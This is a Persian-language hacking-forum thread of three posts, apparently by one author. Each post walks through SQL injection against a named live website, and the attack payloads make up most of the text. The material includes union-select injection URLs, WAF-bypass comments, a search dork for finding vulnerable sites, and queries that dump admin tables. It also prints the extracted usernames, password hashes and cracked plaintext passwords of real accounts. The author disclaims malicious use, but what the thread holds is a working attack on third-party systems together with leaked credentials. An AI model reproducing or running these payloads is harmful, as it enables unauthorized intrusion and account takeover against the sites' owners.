رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.••

با سلام خدمت کاربران محترم انجمن گاردایران

در این تاپیک قصد دارم تارگت با نکات خاص رو خدمتتون آموزش بدم ولی قبلش باید یادآوری کنم که این آموزش ها فقط برای آشنایی و یادگیری شماست هر گونه استفاده ی غیرمجاز به عهده ی خود شماست !

در ضمن دوستان عزیزی که به ضمینه ی هک و امنیت علاقه مند هستند میتوانند این آموزش هارو دنبال کنند و با مراجعه به تاپیک های قبلی بنده میتونید این آموزش رو از اول یاد بگیرید چون در اینجا فقط به نکات اشاره خواهد شد

نکته : هک ر شدن بچه بازی نیست که بخوای برای آسیب رسوندن به دیگران یا تفریح یادبگیری اگر اهدافت برای یادگیری هک اینه همین الان میتونی اینجارو ترک کنی

تارگت :

https://www.nitrogenium.co.in/features-product.php?id=45

با قرار دادن ' آسیب پذیری مشخص خواهد شد

https://www.nitrogenium.co.in/features-product.php?id=45'

حال به سراغ دستورات بعدی برای پیدا کردن ستون های سایت میرویم با استفاده از دستور

https://www.nitrogenium.co.in/features-product.php?id=45 order by 99999--

بسیار خب میبینیم که به کلمه ی order حساس هستش پس بایپس کلمه ی order رو قرار میدیم -> group

https://www.nitrogenium.co.in/features-product.php?id=45 group by 99999--

صفحه load میشود در صورتی که نباید load َود چون هیچ سایتی انقدر ستون ندارد پس بایپسشو قرار میدیم

https://www.nitrogenium.co.in/features-product.php?id=45' group by 99999--+

انقدر اعداد رو کم میکنیم تا صفحه load شود به 25 خواهیم رسید بدین

صورت

https://www.nitrogenium.co.in/features-product.php?id=45' group by 25--+

حال باید دستورات بعدی برای بیرون کشیدن database اعمال کنیم برای راحتی کارشما که شاید برنامه Hackbar روی مرورگرتون نصب نباشه لیست اعداد رو تهیه کردم که بتونید راحت جای گذاری کنید

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70

خب دستورات رو وارد میکنیم بدین شکل

https://www.nitrogenium.co.in/features-product.php?id=45' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+

ولی با یک Error معروف رو به رو خواهیم شد پس با دستور

/*!00000union*/

بایپس میکنیم

https://www.nitrogenium.co.in/features-product.php?id=-45' /*!00000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+

خب حالا میریم سراغ بیرون کشیدن table های سایت

https://www.nitrogenium.co.in/features-product.php?id=-45' /*!00000union*/ select 1,2,3,4,5,6,group_concat(table_name,0x3c62723e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+

میبینیم که دوباره با Error معروف Not Acceptable! مواجه خواهیم شد خیلی راحت با دستوراتی که خدمتتون عرض کردم بایپس کنید بدین شکل

https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(table_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.tables*/+/*!00000where*/+table_schema=database()--+

سایتی رو معرفی میکنم که برای hex کردن متن کمکتون میکنه

Text To Hex

بسیار خب میریم سراغ دستورات بعدی شروع به hex کردن admin_log میکنیم و در دستور قرار میدیم (اگر با دستورات آشنا نیستی موضوعات قبلی تاپیک های بنده رو ببین )

https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(column_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.columns*/+/*!00000where*/+table_name=0x61646d696e5f6c6f67--+

و دستور بعد برای استخراج داده

https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(uid,0x3a,upass,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+admin_log--+

دوستان عزیز لطفا از آموزش ها سو استفاده نکنید این آموزش ها فقط برای یادگیری شماست پس لطفا کسی رو دیفیس نکنید سعی میکنم هر روز یک تاپیک در مورد تارگت با نکات خاص قرار بدم

لطفا در اینجا اسپم نکنید برای ادامه ی آموزش ها فقط تاپیک را بپسندید

موفق باشید

admin11:admin11   username & password

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.••

با سلام خدمت شما کاربران محترم تیم انجمن گاردایران

خب دوستان میریم سراغ تارگت بعدی برای آموزش شما فقط لازم به ذکر است که اگر این تاپیک رو تازه دیدی به تاپیک های قبلی بنده مراجعه کن چون در تارگت های بعدی سعی میکنم نکات و بایپس هارو خدمتتون عرض کنم

دورک:

inurl:"product.php?id="

 تارگت

https://www.lghk.com/product.php?id=46&pid=7

با قرار دادن ' آسیب پذیری مشخص خواهد شد فقط اینو در نظر داشته باشید که اگر ' جواب نداد از '' و '( , \ استفاده کنید و خیلی سریع نرید سراغ تارگت بعدی

مرحله ی بعد دستورات رو وارد میکنیم برای پیدا کردن ستون آسیب پذیر

https://www.lghk.com/product.php?id=46&pid=7 order by 99999--
https://www.lghk.com/product.php?id=46&pid=7 order by 17--

خب دستورات بعدی برای بیرون کشیدن Database تزریق میکنیم

https://www.lghk.com/product.php?id=46&pid=7%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

بایپس - پشت عدد قرار خواهیم داد برای نمایش اعداد آسیب پذیر

https://www.lghk.com/product.php?id=46&pid=-7%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

چه اتفاقی افتاد ؟!!!! هیچی !!؟؟ ناامید نشو لطفا مرحله به مرحله برو جلو سریع جوابو این پایین نگاه نکن سعی خودتو تست کنی که بتونی توی این کار حرفه ای بشی البته برای اهداف خیر نه شر !

سعی میکنم تارگت هایی رو بیارم که نکته دارن . شما باید سعی کنید تمام جزئیات سایت رو زیر نظر بگیرید روی تمام لینکها موستونو ببرید اگه نتیجه ای نشد وارد source سایت بشید اگرم نگرفتید بایپس های زیادی برای نشون دادن ستون ها هستش که با هر تارگت و نکته خدمتتون عرض میکنم در این تارگت گر به عدد 16 شک کنید و version سایت رو سوال کنید میبینید که نتیجه میگیرید

https://www.lghk.com/product.php?id=46&pid=-7%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17--

به همین راحتی !!!

خب توی این تارگت یک روش راحت برای بیرون کشیدن اطلاعات سایت با جزئیات میخوام یادتون بدم فقط اینکه بعضی جاها جواب میده اگر در بعضی تارگت ها جواب نداد میتونید بایپسش کنید که کارتون زمان بر میشه من سعی میکنم روش هایی رو بگم که در زمان کم تر بتونید بتونید به تارگتون نفوذ کنید

خب به جای عدد 16 دستور زیر را وارد کنید

(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)

چه اتفاقی افتاد ؟!!!! بله درسته همه چیز به همین سادگی مشخص شد حالا table های مهم رو انتخاب کن و با دستور زیر بیرون بکش

https://www.lghk.com/product.php?id=46&pid=-7%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(usr_name,0x3a,usr_pwd,0x3c62723e),17+from+usr--

دوستان لطفا تارگت هایی که معرفی میکنم دیفیس نکنید این تارگت ها فقط جنبه ی آموزشی دارند به هیچ عنوان تغییری در سایت ایجاد نکنید

تا تارگت بعدی موفق باشید

 

 

 

 

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.••

با سلام خدمت شما کاربران محترم تیم انجمن گاردایران

تارگت ساده ی بعدی برای آموزش شما

http://www.easunreyrolle.com/product.php?id=60

با گذاشتن ' آسیب پذیری نمایان خواهد شد

http://www.easunreyrolle.com/product.php?id=60'

با قرار دادن دستور

order by 999999--

برای نمایش تعداد ستون های آسیب پذیر

http://www.easunreyrolle.com/product.php?id=60 order by 99999--

به عدد 9 خواهید رسید که صفحه load خواهد شد

http://www.easunreyrolle.com/product.php?id=60 order by 9--

با وارد کردن دستور

Union select 1,2,3,4,5,6,7,8,9--

ستون ها نمایش داده خواهند شد در صورت نمایان نشدن - برای بایپس در پشت عدد قرار دهید

http://www.easunreyrolle.com/product.php?id=-60%20union%20select%201,2,3,4,5,6,7,8,9--

سپس با دستور

group_concat(table_name,0x3c62723e)+from+information_schema.tables+where+table_schema=database()

در ستون آسیب پذیر database مشخص خواهد شد

http://www.easunreyrolle.com/product.php?id=-60%20union%20select%201,2,3,group_concat(table_name,0x3c62723e),5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--

به این صورت

admin_sections
adminlogin
adminroles
categorydocs
categoryfeature
categorymain
enewsletters
financial
homecontent
ircats
irfiles
irpages
logs
maxvalues
newsletter
orderdetail
ordermain
productdesc
productdocs
productfeature
productmain
secountries
senews
senewscatlinks
senewscats
sestaticpages
tblproducts
tbltemp
userdetails

database مهم را به hex تبدیل میکنیم اگر برنامه خاصی برای hex کردن نداری از این سایت کمک بگیر ----> کلیک کنید

adminlogin ===> 0x61646d696e6c6f67696e

خب hex شده رو به جای database قرار دهید و تبدیلات را به این صورت اعمال کنید

table_schema ---> table_name
information_schema.tables ---> information_schema.columns
table_name ---> column_name
http://www.easunreyrolle.com/product.php?id=-60%20union%20select%201,2,3,group_concat(column_name,0x3c62723e),5,6,7,8,9+from+information_schema.columns+where+table_name=0x61646d696e6c6f67696e--

table های مهم نمایان خواهند شد بدین شکل

adm_id
adm_name
adm_password
adm_fullname
adm_email
adm_phone
adm_type
adm_status
adm_crt_by
adm_crt_date
adm_md_date
adm_passupddate

و سپس با وارد کردن دستور

http://www.easunreyrolle.com/product.php?id=-60%20union%20select%201,2,3,group_concat(adm_name,0x3a,adm_password,0x3c62723e),5,6,7,8,9+from+adminlogin--

اطلاعات بیرون کشیده خواهند شد بدین شکل

admin:a0f78676e8d2a024a649075a14b5b451b381a909e00d39fb1e3e5edff6c1b15fbb973606b58ad7778786003889e6e0f1b9b8078c9750c4fe3f49dd8bc544e51e
rohit:9b9a3c5afd4590b20885a6f08f666d3233080aff2a5aaba84838047fabc3a9e0ea341d508a45b9b6a20a9bcd820da1c8b2f3c26e158b0113a72ebc7d199926a6
administrator:55635945fbc505218b9997621db44ddfca2db85cecf6b320590bdcb336e3566c64f10074863b1311f09ec5b855fa504b625a367f06075b3bc0ac6939a7e0e812
plop:78b662931bb5ff208c1e798a2a06b7dd



Crack 


78b662931bb5ff208c1e798a2a06b7dd:------>>>>>plopplop
9b9a3c5afd4590b20885a6f08f666d3233080aff2a5aaba84838047fabc3a9e0ea341d508a45b9b6a20a9bcd820da1c8b2f3c26e158b0113a72ebc7d199926a6:----------------->teamwork
55635945fbc505218b9997621db44ddfca2db85cecf6b320590bdcb336e3566c64f10074863b1311f09ec5b855fa504b625a367f06075b3bc0ac6939a7e0e812:---------->admin643
a0f78676e8d2a024a649075a14b5b451b381a909e00d39fb1e3e5edff6c1b15fbb973606b58ad7778786003889e6e0f1b9b8078c9750c4fe3f49dd8bc544e51e:

سعی میکنم روزی یک آموزش واستون قرار بدم و در ضمن دوستان عزیز لطفا تارگت های آموزشی را دیفیس نکنید این تارگت ها فقط برای آموزش شماست پس تمرین کنید که در آینده بتونید پیشرفت کنید در این زمینه

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...